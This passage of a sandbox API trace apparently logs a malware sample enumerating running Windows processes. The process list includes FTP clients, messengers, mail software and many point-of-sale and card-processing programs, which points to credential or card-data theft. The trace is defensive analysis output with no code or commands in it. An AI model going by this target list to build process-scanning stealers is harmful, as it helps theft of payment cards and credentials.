th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0260.011] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0260.014] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0260.016] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0260.018] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0260.020] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0260.021] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0260.023] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0260.025] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0260.027] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0260.029] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0260.030] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0260.032] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0260.034] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0260.036] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0260.075] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0260.076] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0260.078] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0260.079] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0260.081] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0260.083] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0260.085] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0260.087] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0260.088] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0260.090] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0260.092] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0260.093] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0260.095] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0260.097] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.098] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.100] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0260.102] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.104] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.105] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0260.107] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0260.148] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0260.150] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.152] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0260.153] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0260.155] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0260.156] CloseHandle (hObject=0x2338) returned 1 [0260.157] Sleep (dwMilliseconds=0x64) [0260.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0260.226] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.228] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.229] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.231] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.232] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.234] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.236] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.237] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.238] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.240] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.241] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.287] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.288] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.300] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.302] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.303] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.305] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.307] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.310] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.311] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.313] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0260.314] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.316] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0260.318] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.319] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0260.321] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0260.322] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0260.324] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0260.325] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0260.327] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0260.328] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.330] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.368] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0260.369] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.371] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.373] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.374] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0260.397] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0260.400] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0260.402] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0260.404] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0260.406] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0260.407] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 